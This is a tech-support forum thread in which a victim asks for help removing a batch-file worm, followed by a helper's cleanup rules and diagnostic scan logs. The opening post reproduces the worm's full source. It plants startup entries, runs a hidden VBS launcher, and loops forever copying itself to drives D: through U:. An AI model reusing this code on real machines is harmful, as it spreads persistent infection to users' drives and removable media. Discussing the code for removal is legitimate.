TechSpot

Need help removing file

By blackclaw96
Mar 12, 2016
  1. I opened a .bat file named 'movie.bat' from a pen drive and it was copied into every drive partition.I tried deleting the copies, but the file appears immediately after deleting.the same happened after I deleted the files created in the startup folder.please help me solve it......

    I couldnt upload the file, so I have copied the code here



    @Echo off
    (echo @Echo off
    echo color 1a
    echo title @VIRUS = HR
    echo echo HAHAHA!!
    echo pause)>"%appdata%\Microsoft\windows\start menu\Programs\Startup\system.bat"
    (echo @Echo off
    echo :A
    echo copy /y %appdata%\movie.bat d:
    echo copy /y %appdata%\movie.bat e:
    echo copy /y %appdata%\movie.bat f:
    echo copy /y %appdata%\movie.bat g:
    echo copy /y %appdata%\movie.bat h:
    echo copy /y %appdata%\movie.bat I:
    echo copy /y %appdata%\movie.bat j:
    echo copy /y %appdata%\movie.bat k:
    echo copyta%\ /y %appdata%\movie.bat l:
    echo copy /y %appdata%\movie.bat m:
    echo copy /y %appdata%\movie.bat n:
    echo copy /y %appdata%\movie.bat o:
    echo copy /y %appdata%\movie.bat p:
    echo copy /y %appdata%\movie.bat q:
    echo copy /y %appdata%\movie.bat r:
    echo copy /y %appdata%\movie.bat s:
    echo copy /y %appdata%\movie.bat t:
    echo copy /y %appdata%\movie.bat u:
    echo goto A)>"%appdata%\vol.bat"
    (echo Set WshShell = CreateObject^("WScript.Shell"^)
    echo WshShell.Run chr^(34^) ^& "%appdata%\vol.bat" ^& Chr^(34^), 0
    echo Set WshShell = Nothing) > "%appdata%\Microsoft\windows\start menu\Programs\startup\windows.vbs"
    copy movie.bat %appdata%
     
  2. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Welcome aboard [​IMG]

    Please, complete all steps listed here: http://www.techspot.com/vb/topic58138.html
    Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
    Attached logs won't be reviewed.

    Please, observe following rules:
    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
     
  3. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
    Ran by WELCOME (2016-03-13 13:19:48)
    Running from C:\Users\WELCOME\Desktop
    Windows 7 Ultimate Service Pack 1 (X64) (2015-09-05 15:38:06)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3006523739-2206101463-1198655294-500 - Administrator - Disabled)
    Guest (S-1-5-21-3006523739-2206101463-1198655294-501 - Limited - Disabled) => C:\Users\Guest
    HomeGroupUser$ (S-1-5-21-3006523739-2206101463-1198655294-1002 - Limited - Enabled)
    WELCOME (S-1-5-21-3006523739-2206101463-1198655294-1000 - Administrator - Enabled) => C:\Users\WELCOME

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Panda Cloud Antivirus (Enabled - Up to date) {3456760B-FDAA-FFFD-06C2-7BB528D2066C}
    AS: Panda Cloud Antivirus (Enabled - Up to date) {8F3797EF-DB90-F073-3C72-40C753554CD1}
    AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Panda Cloud Firewall (Disabled) {0C6DF72E-B7C5-FEA5-2D9D-D280D6014117}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
    Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
    Adobe Flash Player 19 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 19.0.0.207 - Adobe Systems Incorporated)
    Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
    Adobe InDesign CC 2014 (HKLM-x32\...\{CCDCB9C4-72BA-1014-A3F8-D123F2F18BC2}) (Version: 10.0 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Photoshop Lightroom 5.3 64-bit (HKLM\...\{2DD71ACB-552D-402C-9529-7906ACB95C30}) (Version: 5.3.1 - Adobe Systems Incorporated)
    Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
    AirDroid 3.2.0.0 (HKLM-x32\...\AirDroid) (Version: 3.2.0.0 - Sand Studio)
    Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
    Autodesk 360 (HKLM\...\{556966D9-F7F6-421B-9707-D07901604DDF}) (Version: 5.0.29.1101 - Autodesk)
    Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk)
    Autodesk Design Review 2013 (HKLM-x32\...\Autodesk Design Review 2013) (Version: 13.0.0.82 - Autodesk, Inc.)
    Autodesk Design Review 2013 (x32 Version: 13.0.0.82 - Autodesk, Inc.) Hidden
    Autodesk Inventor Content Center Libraries 2015 (Desktop Content) (HKLM\...\{B46DECD1-1964-4EF1-0000-22D71E81877C}) (Version: 19.0.15900.0000 - Autodesk)
    Autodesk Inventor Professional 2015 - English (HKLM\...\Autodesk Inventor Professional 2015) (Version: 19.0.15900.0000 - Autodesk)
    Autodesk Inventor Professional 2015 (Version: 19.0.15900.0000 - Autodesk) Hidden
    Autodesk Inventor Professional 2015 English Language Pack (Version: 19.0.15900.0000 - Autodesk) Hidden
    Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - Autodesk)
    Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 5.2.9.100 - Autodesk)
    Autodesk Material Library Low Resolution Image Library 2015 (HKLM-x32\...\{4FBC9635-AC56-4378-8FDE-C4D3ED072681}) (Version: 5.2.9.100 - Autodesk)
    Autodesk ReCap (HKLM\...\Autodesk ReCap) (Version: 1.3.1.39 - Autodesk)
    Autodesk ReCap (Version: 1.3.1.39 - Autodesk) Hidden
    Autodesk Revit Interoperability for Inventor 2015 (HKLM\...\Autodesk Revit Interoperability for Inventor 2015) (Version: 15.0.107.0 - Autodesk)
    Autodesk Revit Interoperability for Inventor 2015 (Version: 15.0.107.0 - Autodesk) Hidden
    Autodesk Vault Basic 2015 (Client) (HKLM\...\Autodesk Vault Basic 2015 (Client)) (Version: 19.0.49.0 - Autodesk)
    Autodesk Vault Basic 2015 (Client) (Version: 19.0.49.0 - Autodesk) Hidden
    Autodesk Vault Basic 2015 (Client) English Language Pack (Version: 19.0.49.0 - Autodesk) Hidden
    BitMeter (HKLM-x32\...\BitMeter) (Version: - )
    BlueStacks App Player (HKLM-x32\...\{F4224F2B-8E51-42F9-9C2A-EF22C5FC6777}) (Version: 0.9.4.4078 - BlueStack Systems, Inc.)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    CCleaner (HKLM\...\CCleaner) (Version: 5.08 - Piriform)
    CheVolume 0.4.0.2 (HKLM-x32\...\CheVolume 0.4.0.2) (Version: - WellWeWeb)
    Configurator 360 addin (HKLM-x32\...\{8FE324B0-B934-4D68-BAB5-DE2136036237}) (Version: 19.0.11300.9000 - Autodesk, Inc.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.2109.0 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.2109.0 - CyberLink Corp.) Hidden
    DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.45.3.0297 - DT Soft Ltd)
    Defraggler (HKLM\...\Defraggler) (Version: 2.18 - Piriform)
    DVDFab 9.1.8.8 (13/02/2015) (HKLM-x32\...\DVDFab 9_is1) (Version: - Fengtao Software Inc.)
    Eco Materials Adviser for Autodesk Inventor 2015 (64-bit) (HKLM\...\{2F7441CB-A646-41F1-B1CB-518AB311138B}) (Version: 5.1.2.0 - Granta Design Limited)
    FARO LS 1.1.502.0 (64bit) (HKLM-x32\...\{66D83FE0-D798-4B38-86FE-FB48151E5AEF}) (Version: 5.2.0.35213 - FARO Scanner Production)
    FormatFactory 2.30 (HKLM-x32\...\FormatFactory) (Version: 2.30 - Free Time)
    Free Alarm Clock (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group)
    Futuremark SystemInfo (HKLM-x32\...\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.17.0 - Futuremark Corporation)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.21.115 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Greenshot 1.1.7.17 (HKLM\...\Greenshot_is1) (Version: 1.1.7.17 - Greenshot)
    Halo 2 for Windows Vista (HKLM-x32\...\Halo 2) (Version: - Microsoft Game Studios)
    Halo 2 for Windows Vista (x32 Version: 1.0.0.0 - Microsoft Corporation) Hidden
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.4264 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    iTunes (HKLM\...\{76FF0F03-B707-4332-B5D1-A56C8303514E}) (Version: 11.0.4.4 - Apple Inc.)
    Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
    Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
    Microsoft Games for Windows - LIVE (HKLM-x32\...\{F112F66E-25CA-42DD-983C-6118EB38F606}) (Version: 3.0.89.0 - Microsoft Corporation)
    Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{2E660A2A-A55F-43CD-9F73-CAD7382EEB78}) (Version: 3.0.19.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
    Mockup 360 Addin 2015 (HKLM-x32\...\{E4D4242C-FC14-4B4F-B1D9-6760D8C241D5}) (Version: 1.1.0 - Autodesk)
    Mozilla Firefox 40.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0 (x86 en-US)) (Version: 40.0 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0 - Mozilla)
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    My WIFI Router (HKLM-x32\...\My WIFI Router) (Version: 3.0.064-1201-001 - TxNetwork, Inc.)
    Need for Speed Most Wanted (HKLM-x32\...\Need for Speed Most Wanted_R.G. Mechanics_is1) (Version: - R.G. Mechanics, Panky)
    Nero 2014 (HKLM-x32\...\{F384C1E1-3A16-4073-95C3-7271FE0ED4C2}) (Version: 15.0.02200 - Nero AG)
    NewBlue Video Essentials for PowerDirector (HKLM\...\NewBlue Video Essentials for Cyberlink) (Version: 3.0 - NewBlue)
    Noise Reduction Plug-In 2.0 (HKLM-x32\...\{36DF4580-D1B3-11E3-A23E-F04DA23A5C58}) (Version: 2.0.628 - Sony)
    Panda Cloud Antivirus (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 3.0.1 - Panda Security)
    Panda Cloud Antivirus (Version: 7.05.00.0000 - Panda Security) Hidden
    Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.01 - Panda Security)
    Panda Devices Agent (x32 Version: 1.04.00 - Panda Security) Hidden
    Panda Security Toolbar (HKLM-x32\...\pandasecuritytb) (Version: 4.2.0.10 - Panda Security)
    Panda Security URL Filtering (HKLM-x32\...\Panda Security URL Filtering) (Version: 2.0.1.4 - Panda Security)
    Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
    PowerISO (HKLM-x32\...\PowerISO) (Version: - )
    Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
    Pushbullet version 338 (HKLM-x32\...\{7578F204-49E7-4830-B051-14C23F408BFE}_is1) (Version: 338 - Pushbullet Inc)
    Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.3 r2519 - )
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.82.317.2014 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7200 - Realtek Semiconductor Corp.)
    Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
    Sniper Elite V2 (HKLM-x32\...\Sniper Elite V2_is1) (Version: - )
    Sound Forge Pro 11.0 (HKLM-x32\...\{3F1EEA40-9515-11E4-9B3B-F04DA23A5C58}) (Version: 11.0.299 - Sony)
    SoundWire Server version 2.1.2 (HKLM-x32\...\{E15658BC-7742-4397-999F-98B1BD11B784}_is1) (Version: 2.1.2 - GeorgieLabs)
    SpeedBit Video Accelerator (HKLM-x32\...\SpeedBit Video Accelerator) (Version: 3380(build_3064) - SpeedBit Ltd.)
    TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version: - Code Sector)
    TP-LINK TL-WN725N_TL-WN723N Driver (HKLM-x32\...\{3C3F9CEB-2C5A-4A47-8EAA-DA76037546BA}) (Version: 1.3.1 - TP-LINK)
    TP-LINK Wireless Configuration Utility (HKLM-x32\...\{319D91C6-3D44-436C-9F79-36C0D22372DC}) (Version: 1.3.1 - TP-LINK)
    USB Debugging Driver (HKLM\...\{B61F9010-3474-11E4-8C21-0800200C9A66}) (Version: 1.0.4 - Invisibility Ltd)
    UxStyle Core Beta (HKLM\...\{8E363055-15E5-4D8A-9C69-A0A9DE9A3337}) (Version: 0.2.1.1 - The Within Network, LLC)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{6DA2B636-698A-3294-BF4A-B5E11B238CDD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{8CCEA24C-51AE-3B71-9092-7D0C44DDA2DF}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{C3A57BB3-9AA6-3F6F-9395-6C062BDD5FC4}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{F6F09DD8-F39B-3A16-ADB9-C9E6B56903F9}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{04B34E21-5BEE-3D2B-8D3D-E3E80D253F64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{14866AAD-1F23-39AC-A62B-7091ED1ADE64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{4B90093A-5D9C-3956-8ABB-95848BE6EFAD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{B42E259C-E4D4-37F1-A1B2-EB9C4FC5A04D}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
    VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Winamp (HKLM-x32\...\Winamp) (Version: 5.623 - Nullsoft, Inc)
    Winamp Detector Plug-in (HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
    Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (12/06/2010 4.0.0000.00000) (HKLM\...\76F6B4A696B8C9A7ACFF01D4E1D6EF2D974C3E67) (Version: 12/06/2010 4.0.0000.00000 - Google, Inc.)
    Windows Driver Package - Invisibility Ltd (WinUSB) AndroidUsbDeviceClass (08/27/2012 7.0.0000.00005) (HKLM\...\8A4E2C1CC86657295291BAC6A1C2C1718C9BE52C) (Version: 08/27/2012 7.0.0000.00005 - Invisibility Ltd)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (01/05/2012 2.0000.0.1) (HKLM\...\49D9ABA9270C5BDFD7AE1BEB607D36B26BB90235) (Version: 01/05/2012 2.0000.0.1 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (09/01/2011 2.0.1136.0) (HKLM\...\32DC281B7E359EA3D16ECC7D98609F6A592B981D) (Version: 09/01/2011 2.0.1136.0 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. (usbser) Ports (12/24/2011 2.0000.0.0) (HKLM\...\D0E6296D177F42BB31C0200E49412003DB6C4633) (Version: 12/24/2011 2.0000.0.0 - MediaTek Inc.)
    Windows Driver Package - MediaTek Inc. Net (07/14/2011 1.1129.00) (HKLM\...\89BF901AB9E67C6D8D35E49F33EBEA28C8B5F658) (Version: 07/14/2011 1.1129.00 - MediaTek Inc.)
    Windows Driver Package - Microsoft (WUDFRd) WPD (02/22/2006 5.2.5326.4762) (HKLM\...\B77DDB8A5697AAF5DA4E4859E53C301B877DD206) (Version: 02/22/2006 5.2.5326.4762 - Microsoft)
    WinRAR 5.30 beta 2 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.2 - win.rar GmbH)
    Winrar Activator version 1.2 (HKLM-x32\...\{AE0B3F2A-EB65-4D01-A3E1-6D879C6AAF2A}_is1) (Version: 1.2 - Rarlab)
     
  4. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{00F064D8-FEC3-48ac-B07D-39C314D1727B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{0215A4C0-5431-4FD0-9B06-46589B5C4939}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{048ED0E0-12CF-4C0F-9FFA-947C2FBE8C8E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{071339A1-1946-44B2-B63E-50459B15DB86}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TestServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{08A60FF7-BB37-44F4-9759-0ADA6C7B9CC9}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{0B38CACA-3D3C-48EA-BEB5-7D95F4F6EE15}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{0C3393F8-94F5-4B79-8C01-49A2D0CC0FE9}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{0D555CE0-304A-47A6-858B-B145209A3982}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1029ABC3-2457-11D5-8E9D-0010B541CD80}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Compatibility\Bin\DbxBridge.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{12545889-6D32-4424-9967-1E1D7BD1F809}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{13009989-EFB5-48C9-8BD2-943E0392BD71}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxAppCtrl.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{14679E3B-C952-4998-8E13-4B1286E6DD99}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1481B385-759A-4B00-9257-E96357563999}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{162EF0A1-5A33-46F2-ACCF-CA388B084A09}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{18A21864-E37B-42b9-9612-2C1E8C450A29}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1D625598-C876-4C51-8EF5-F9D8F96F62AA}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1D6DFD6A-9E16-435A-9327-6FFEC6BA372F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1E5724EA-3423-4BD3-ABD6-46E650D2DC66}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1E8A29BA-827D-4031-A4A3-AE7999B402F6}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1EA072EE-57FD-495E-889C-8243C3BDBDBC}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{1FD7F53F-7ED5-439C-9A77-A3821CD09E98}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{20E47D5B-529A-45BD-8E77-BF1A3064A008}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{21DB88B0-BFBF-11D4-8DE6-0010B541CAA8}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\iDrop.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{244298EC-E661-11d4-BC13-0010B5891E89}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TI.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{2709544A-5B24-4F9F-A5DA-CEC7297D3A4E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{2BCA857B-A18B-4AFA-B183-CC0E49C12058}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{2C74F89E-7421-46B4-BA54-F86F1BD9F237}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{2C7D1157-7D50-4A88-9777-5EBBA3189AB8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{2F8377FC-50C1-44EF-AB7A-8FF1BB8EA277}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{3497C2EC-5684-4B21-AF74-F6760E0221DC}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{3897B445-D5B8-410d-899A-9789B8ADB643}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Compatibility\Bin\DbxBridge.exe (Autodesk, Inc.)
